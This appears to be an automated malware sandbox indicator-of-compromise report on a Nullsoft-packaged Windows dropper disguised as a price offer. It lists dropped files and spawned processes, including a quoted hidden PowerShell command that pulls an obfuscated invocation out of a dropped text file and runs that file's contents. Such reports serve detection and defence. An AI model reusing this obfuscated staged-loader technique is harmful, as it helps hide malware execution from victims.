IOC Report
Price Offer_1200R4 1200R20.exe

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| Price Offer_1200R4 1200R20.exe | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | initial sample | malicious |
| C:\Users\user\AppData\Local\Temp\Gastrostomize.exe | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | dropped | malicious |
| C:\Users\user\AppData\Local\Temp\Gastrostomize.exe:Zone.Identifier | ASCII text, with CRLF line terminators | dropped | malicious |
| C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33 | ASCII text, with very long lines (65536), with no line terminators | dropped | malicious |
| C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\AdvSplash.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped | malicious |
| C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\nsDialogs.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped | malicious |
| C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Gastrostomize.exe.log | ASCII text, with CRLF line terminators | dropped | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hg1llhqc.aon.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psbwawut.eua.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Aarhusianeren.Sna | data | dropped | |
| C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\afviserblinkenes.cin | data | dropped | |
| C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\hambro.kio | data | dropped | |
| C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\hjlperen.adm | data | dropped | |
| C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\litografiens.eup | data | dropped | |
| C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\nontenurial.tra | data | dropped | |
| C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\stlndingen.dis | data | dropped | |
| C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\temperaturmaaling.txt | ASCII text, with CRLF line terminators | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe | "C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe" | malicious |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "powershell.exe" -windowstyle hidden "$Facils=Get-Content 'C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33';$Cowpox=$Facils.SubString(36576,3);.$Cowpox($Facils)" | malicious |
| C:\Users\user\AppData\Local\Temp\Gastrostomize.exe | "C:\Users\user\AppData\Local\Temp\Gastrostomize.exe" | malicious |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |

URLs
